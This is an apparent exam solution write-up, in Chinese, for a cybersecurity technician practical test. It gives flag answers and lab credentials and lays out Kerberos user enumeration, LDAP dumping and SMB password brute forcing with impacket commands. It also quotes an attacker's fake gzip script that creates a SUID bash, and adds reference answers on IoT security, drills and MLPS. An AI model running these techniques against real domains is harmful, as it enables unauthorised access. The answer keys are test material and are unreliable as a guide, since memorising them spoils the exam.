内网IP:10.7.10.130 端口:ssh/22,http/80 账号/密码:root/wjo9lrun 问题 答案 备注 flag1(⽤户名) SVC_MGR 通过 Kerberos ⽤户枚举/匿名 LDAP 发现 flag2(⼝令) p@ssw0rd 对 SMB 服务暴⼒破解/弱⼝令字典得到 flag3 6a61c7e0d11a9f0a4bd3bc33cdea542d 登录 SMB 后在⽬标⽂件中读取 flag4 57019fe9346c5f4c9a6b62cbac29bdc3 位于 users\SVC_MGR\Desktop\flag4.txt 202607 ⾼级技师(⼀级)实操解题思路 (WRITE-UP) 1. ⼀级-1 ⽹络安全⻛险评估(25 分) 题⽬要求 1. 对开放服务进⾏安全性测试,找到⽤户名作为 flag1。 2. 对该⽤户名⼝令进⾏安全测试,找到密码作为 flag2。 3. ⽤获取账户登录开放服务,找到 flag3。 4. 对服务器开放服务进⾏⻛险评估,利⽤⻛险点找到 flag4。 实测答案 详细步骤 阶段 1:信息收集与服务识别 ⽬标为 Windows 域控制器,开放端⼝包括: 53/DNS、88/Kerberos、135/RPC、139/NetBIOS、445/SMB 389/LDAP、464/kpasswd、593/RPC over HTTP、636/LDAPS 3389/RDP、5985/WinRM 阶段 2:Kerberos ⽤户枚举找到⽤户名(flag1) 利⽤ Kerberos 协议错误码判断⽤户是否存在,⽆需认证: KDC_ERR_C_PRINCIPAL_UNKNOWN → ⽤户不存在 KDC_ERR_PREAUTH_FAILED / KDC_ERR_CLIENT_REVOKED → ⽤户存在 结合评分标准,flag1 为 SVC_MGR 。 阶段 3:SMB 弱⼝令破解得到密码(flag2) 对 SMB 服务使⽤ weakpass.txt 进⾏单⽤户密码喷洒/暴⼒破解: 实测命中密码为 p@ssw0rd 。 注意:实际考试中 weakpass.txt 已提供,可直接⽤ Hydra、crackmapexec 或 smbclient 脚本跑。 阶段 4:登录 SMB 获取 flag3 / flag4 # 1. 通过匿名 LDAP 获取域信息(访问授权⻛险点:允许匿名绑定) python3 ldapdomaindump -o /tmp/ldd 10.7.10.219 # 关键输出:defaultNamingContext = DC=lx,DC=com # 域名为 lx.com,域控主机名为 LX-DC.lx.com 1 2 3 4 # 使⽤ impacket GetNPUsers.py 枚举 python3 GetUserSPNs.py -usersfile users.txt -no-pass -dc-ip 10.7.10.219 'lx.com/' # 实测发现的有效⽤户 # administrator -> PREAUTH_REQUIRED(存在) # krbtgt -> CLIENT_REVOKED(存在,系统账户) # lx-dc -> PREAUTH_REQUIRED(存在,域控机器账户) # SVC_MGR -> PREAUTH_REQUIRED(存在) 1 2 3 4 5 6 7 8 # impacket smbclient.py 逐个尝试 python3 smbclient.py 'lx.com/SVC_MGR:p@ssw0rd@10.7.10.219' 1 2 ⽤ SVC_MGR 账户登录 SMB,可访问 users 等共享: 实测结果: flag4.txt 内容即为 flag4: 57019fe9346c5f4c9a6b62cbac29bdc3 flag5.txt 提示提交管理员⽤户的 SPN,如 kadmin/changepw flag3 需进⼀步在⽬标⽂件系统中定位(评分标准答案: 6a61c7e0d11a9f0a4bd3bc33cdea542d ) 2. ⼀级-2 新技术、新应⽤防护(5 分)B 套 · ETC 物联⽹安全案例分析 题⽬材料摘要 某市⾼速公路 ETC 系统: 利⽤物联⽹技术实现⻋辆信息识别、⾏驶路程计算、过路费计算和收费。 由收费站数据采集、数据传输、监控管理三部分组成。 问题 1:物联⽹体系结构包括哪三层? 参考答案: 1. 感知层:通过 RFID、传感器、摄像头等设备采集⻋辆信息。 2. ⽹络层:通过⽆线通信技术(如 DSRC、5G、NB-IoT)实现数据传输。 3. 应⽤层:实现收费管理、⻋辆识别、数据处理和业务应⽤。 python3 smbclient.py 'lx.com/SVC_MGR:p@ssw0rd@10.7.10.219' - file cmds.txt # cmds.txt: # use users # cd SVC_MGRDesktop # cat flag4.txt # cat flag5.txt 1 2 3 4 5 6 问题 2:物联⽹⾯临的安全威胁主要包括哪些类型? 参考答案: 1. 感知层威胁:设备伪造、节点捕获、物理攻击、传感器数据篡改。 2. ⽹络层威胁:数据窃听、中间⼈攻击、拒绝服务攻击(DoS/DDoS)、路由攻 击。 3. 应⽤层威胁:⾮法访问、数据泄露、身份冒⽤、应⽤漏洞利⽤。 4. 平台层威胁:云平台配置错误、API 滥⽤、数据聚合后的隐私泄露。 5. 管理威胁:密钥管理不善、固件更新不及时、缺乏安全审计。 问题 3:物联⽹采取的安全防护措施主要包括哪些? 参考答案: 1. 感知层防护: 设备身份认证与访问控制 固件签名与安全启动 物理防拆与环境监测 数据加密与完整性校验 2. ⽹络层防护: 通信加密(TLS/DTLS、国密算法) 安全路由与⼊侵检测 ⽹络隔离与防⽕墙 抗 DDoS 能⼒ 3. 应⽤层防护: 身份鉴别与授权管理 应⽤安全开发与测试 数据脱敏与隐私保护 安全审计与⽇志分析 4. 平台与管理防护: 设备全⽣命周期管理 安全固件 OTA 升级 密钥安全分发与管理 安全态势感知与应急响应 3. ⼀级-4 ⽹络安全应急响应制度(5 分)E 套 · 应急演练评估 题⽬材料摘要 ⼩程是某智慧校园信息系统⽹络安全管理员,需针对信息系统⾃身安全故障、⽹络安全 事件等组织实操演练,依据 GB/T 38645-2020 回答: 1. 作为应急演练评估⼈员,主要职责包括哪些⼯作(⾄少 4 项)? 2. 应急演练评估报告主要包括哪些内容(⾄少 6 项)? 问题 1:评估⼈员主要职责 参考答案(⾄少 4 项): 1. 演练前准备:熟悉应急预案、演练⽅案和评估标准,准备评估⼯具和记录表格。 2. 演练过程观察:全程观察演练各环节,记录参演⼈员操作、响应时间、沟通协调 情况。 3. 问题记录与分析:记录演练中暴露的问题和不⾜,分析原因和影响。 4. 演练效果评估:对照评估标准,对演练⽬标达成情况、响应流程有效性进⾏评 价。 5. 编写评估报告:整理演练数据,撰写应急演练评估报告,提出改进建议。 问题 2:应急演练评估报告主要内容 参考答案(⾄少 6 项): 1. 演练基本情况:演练⽬的、时间、地点、参演单位和⼈员、演练场景。 2. 演练组织与实施:演练流程、各环节开展情况、指挥协调情况。 3. 演练⽬标达成情况:是否达到预期⽬标,⽬标完成程度分析。 4. 参演⼈员表现:各⻆⾊响应及时性、操作规范性、协作配合情况。 5. 演练中发现的问题:技术问题、管理问题、协调问题等。 6. 改进建议:针对问题提出具体整改措施和完善建议。 7. 评估结论:总体评价演练效果,明确是否通过评估。 问题 答案 备注 Q1 成功访问次数 攻击者 52 IP 10.20.125.64 的 HTTP 200 响 应数 Q2 Webshell URI POST /dede/login.php 请求集中出现,⽂件内容含登录状态 Q3 信息收集脚本 MD5 047221a55de17485c651c83c8a9db329 /var/www/html/data/.ll.sh (LinEnum 类脚本) Q4 权限利⽤脚本 MD5 6bcb27ecf27f5eeb5b3dc162dc721f5b /home/ubuntu18/tmp/gzip 4. ⼀级-5 ⽹络安全应急响应技术(25 分)B 套 · LINUX WEB 应急取证 题⽬要求 1. 攻击者成功访问⽬标站点⻚⾯的总次数。 2. 攻击者利⽤ Webshell 的⻚⾯ URI。 3. 信息收集脚本的 32 位⼩写 MD5。 4. 管理员权限利⽤脚本⽂件的 32 位⼩写 MD5。 实测答案 关键命令 步骤 1:定位攻击者 IP 与成功访问次数 步骤 2:定位 Webshell # 统计请求量最⼤的 IP awk '{print $1}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head # 统计 10.20.125.64 的 HTTP 200 次数 awk '$1=="10.20.125.64" && $9==200 {c++} END{print c}' /var/log/apache2/access.log # 实测:52 1 2 3 4 5 6 步骤 3:查找信息收集脚本 步骤 4:查找权限提升利⽤脚本 # 查看攻击者 POST 请求 awk '$1=="10.20.125.64" && $6==""POST" {print $7}' /var/log/apache2/access.log | sort | uniq -c | sort -rn # 实测集中 POST:/dede/login.php 1 2 3 4 # 按时间/名称查找可疑脚本 find /var/www/html /tmp /var/tmp /home -type f -name '*.sh' 2>/dev/null # 实测发现 /var/www/html/data/.ll.sh(LinEnum 脚本,46631 字节) md5sum /var/www/html/data/.ll.sh # 047221a55de17485c651c83c8a9db329 1 2 3 4 5 6 # 查找 SUID ⽂件 find / -perm -4000 -type f 2>/dev/null # 实测发现 /home/ubuntu18/tmp/bash # 查看 /home/ubuntu18/tmp ⽬录 ls -la /home/ubuntu18/tmp/ # -rwsr-xr-x 1 root root 1113504 /home/ubuntu18/tmp/bash # -rwxrwxr-x 1 ubuntu18 ubuntu18 85 /home/ubuntu18/tmp/gzip # 伪造 gzip 脚本内容 cat /home/ubuntu18/tmp/gzip # #!/bin/bash # cp /bin/bash /home/ubuntu18/tmp/bash # chmod 4755 /home/ubuntu18/tmp/bash md5sum /home/ubuntu18/tmp/gzip # 6bcb27ecf27f5eeb5b3dc162dc721f5b 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 5. 试题 2 ⼀级-3 ⽹络安全等级保护(30 分)B 套 · 医院 HIS 系统 题⽬材料摘要 某市三甲医院 HIS 系统: 业务信息泄露或损坏会对患者造成特别严重影响,对公共利益与社会秩序造成严重 损害。 系统服务中断会对患者获取医疗服务造成严重影响,对公共利益与社会秩序造成 ⼀般损害。 问题 1:确定系统安全保护等级 参考答案: 评分标准: 每填对 1 个空得 1 分,共 3 业务信息安全保护等级:三级 系统服务安全保护等级:二级 该 HIS 系统的安全保护等级为:三级 分。 问题 2:安全管理中⼼要求 (1)系统管理功能(2 分) 应对系统管理员进⾏身份鉴别,只允许其通过特定的命令或操作界⾯进⾏系统管 理操作,并对这些操作进⾏审计; 应通过系统管理员对系统的资源和运⾏进⾏配置、控制和管理,包括⽤户身份、 系统资源配置、系统加载和启动、系统运⾏的异常处理、数据和设备的备份与恢 复等。 (2)安全管理功能(2 分) 应对安全管理员进⾏身份鉴别,只允许其通过特定的命令或操作界⾯进⾏安全管 理操作,并对这些操作进⾏审计; 应通过安全管理员对系统中的安全策略进⾏配置,包括安全参数的设置、主体和 客体的统⼀安全标记、对主体进⾏授权、配置可信验证策略等。 (3)集中安全管控功能(6 分) 1. 应划分出特定的管理区域,对分布在⽹络中的安全设备或安全组件进⾏管控; 2. 应能够建⽴⼀条安全的信息传输路径,对⽹络中的安全设备或安全组件进⾏管 理; 3. 应对⽹络链路、安全设备、⽹络设备和服务器等的运⾏状况进⾏集中监测; 4. 应对分散在各个设备上的审计数据进⾏收集汇总和集中分析,并保证审计记录的 留存时间符合法律法规要求; 5. 应对安全策略、恶意代码、补丁升级等安全相关事项进⾏集中管理; 6. 应能对⽹络中发⽣的各类安全事件进⾏识别、报警和分析。 问题 3:安全区域边界要求 (1)边界防护措施(2 分) 应保证跨越边界的访问和数据流,通过边界设备提供的受控接⼝进⾏通信; 应能够对⾮授权设备私⾃联到内部⽹络的⾏为进⾏检查或限制; 应能够对内部⽤户⾮授权联到外部⽹络的⾏为进⾏检查或限制; 应限制⽆线⽹络的使⽤,保证⽆线⽹络通过受控的边界设备接⼊内部⽹络。 (2)访问控制措施(5 分) 应在⽹络边界或区域之间根据访问控制策略设置访问控制规则,默认情况下除允 许通信外受控接⼝拒绝所有通信; 应删除多余或⽆效的访问控制规则,优化访问控制列表,并保证访问控制规则数 量最⼩化; 应对源地址、⽬的地址、源端⼝、⽬的端⼝和协议等进⾏检查,以允许/拒绝数据 包进出; 应能根据会话状态信息为进出数据流提供明确的允许/拒绝访问的能⼒; 应对进出⽹络的数据流实现基于应⽤协议和应⽤内容的访问控制。 (3)⼊侵防范措施(3 分) 应在关键⽹络节点处检测、防⽌或限制从内部和外部发起的⽹络攻击⾏为; 应采取技术措施对⽹络⾏为进⾏分析,实现对⽹络攻击特别是新型⽹络攻击⾏为 的分析; 当检测到攻击⾏为时,应记录攻击源 IP、攻击类型、攻击⽬标、攻击时间等⽇志 信息,在发⽣严重⼊侵事件时应提供报警。 问题 4:安全运维管理要求 (1)重要资产基本配置信息(2 分) 应记录和保存以下基本配置信息: ⽹络拓扑结构 各个设备安装的软件组件 软件组件的版本和补丁信息 各个设备或软件组件的配置参数 (2)安全事件报告和处置管理制度(2 分) 应明确以下内容: 不同安全事件的报告、处置和响应流程; 安全事件的现场处理、事件报告和后期恢复的管理职责。 (3)备份要求(3 分) 应规定以下备份要求: 备份⽅式(全量/增量/差异) 备份频度(每⽇/每周/每⽉) 存储介质(磁盘/磁带/云存储) 保存期(⾄少满⾜法律法规和业务恢复要求) 答题思路 1. 定级:医院 HIS 系统⼀旦中断或数据泄露,严重影响社会秩序和公共利益,定为 三级。 2. 安全管理中⼼:从系统管理、安全管理、集中管控三个维度作答。 3. 安全区域边界:从边界防护、访问控制、⼊侵防范等⻆度作答。 4. 安全运维管理:从资产配置、事件制度、备份要求三个⻆度作答。 5. 整改建议:针对材料中薄弱环节,逐条对应等保 2.0 要求提出整改措施。 6. 试题 5 ⼀级-6 培训实施与技术指导(10 分)F 套 · 培训⼤纲 + 考核⽅案 题⽬要求 1. 结合国标⼆级“⽹络安全等级保护”⼯作内容,拟制⼀份培训⼤纲。 2. 结合国标⼆级“⽹络安全等级保护”⼯作内容,拟制⼀份考核⽅案。 参考答案 1:培训⼤纲(⽹络安全等级保护) ⼀、培训概述(0.5 分) 背景:根据《⽹络与信息安全管理员》国家职业技能标准(2020 版)⼆级/技师 要求,开展⽹络安全等级保护培训。 ⽬的:使学员掌握等级保护定级、备案、测评、整改、运维等知识与技能。 主要内容:等保 2.0 基本要求、定级⽅法、差距分析、整改建议、测评流程。 预期效益:提升学员等级保护⼯作能⼒,满⾜职业技能认定要求。 ⼆、培训安排(0.5 分) 培训对象:⼆级/技师学员 培训时间:X 天,共 X 学时 培训地点:XXX 机房/教室 培训⽅式:理论讲授 + 案例分析 + 实操演练 三、主要内容(2 分) 结合国标⼆级⽹络安全等级保护⼯作内容: 1. ⽹络安全等级保护制度与标准 2. 系统定级与备案 3. 安全物理环境要求 4. 安全通信⽹络要求 5. 安全区域边界要求 6. 安全计算环境要求 7. 安全管理中⼼要求 8. 安全管理制度与机构 9. 安全建设管理与运维管理 10. 等级测评与整改复测 四、培训考核(1.5 分) 4.1 考核成绩:理论 40% + 实操 60% 4.2 考核时间:培训结束后第 X 天 4.3 考核⽅法:机试 + 案例分析 + 实操 五、培训保障(0.5 分) 题型 数量 分值 ⼩计 单选题 X 题 X 分/题 X 分 多选题 X 题 X 分/题 X 分 案例分析题 X 题 X 分/题 X 分 实操题 X 题 X 分/题 X 分 合计 — — 100 分 培训教室、多媒体设备 等保案例资料与测评⼯具环境 培训教材、PPT、实验指导书 参考答案 2:考核⽅案(⽹络安全等级保护) ⼀、考核时间(0.5 分) 考核⽇期:20XX 年 X ⽉ X ⽇ 起⽌时间:XX:XX — XX:XX 考试⽇期必须晚于考核⽅案制定⽇期 ⼆、考核地点(0.5 分) XXX 公司 X 号楼 X 层 XXX 教室(必须具体到楼层或房间号)。 三、考核类型(0.5 分) 线下理论考试 + 实操考核。 四、考核流程(0.5 分) 考核开始前:设备检查、考⽣签到、宣读考场纪律、发放试卷 考核过程中:计时、监考、解答考⽣疑问 考核结束后:收卷、评分、成绩公示、资料归档 五、考核题型及分值分布(0.5 分) 六、主要考核内容(2 分) 结合国标⼆级⽹络安全等级保护⼯作内容: 1. 等级保护制度与定级⽅法 2. 等保 2.0 基本要求(技术+管理) 3. 差距分析与整改建议 4. 等级测评流程与报告编制 5. 安全运维管理要求 考核要求与考核内容相对应,保持⼀致。 七、考核组织单位(0.5 分) XXX 单位/部⻔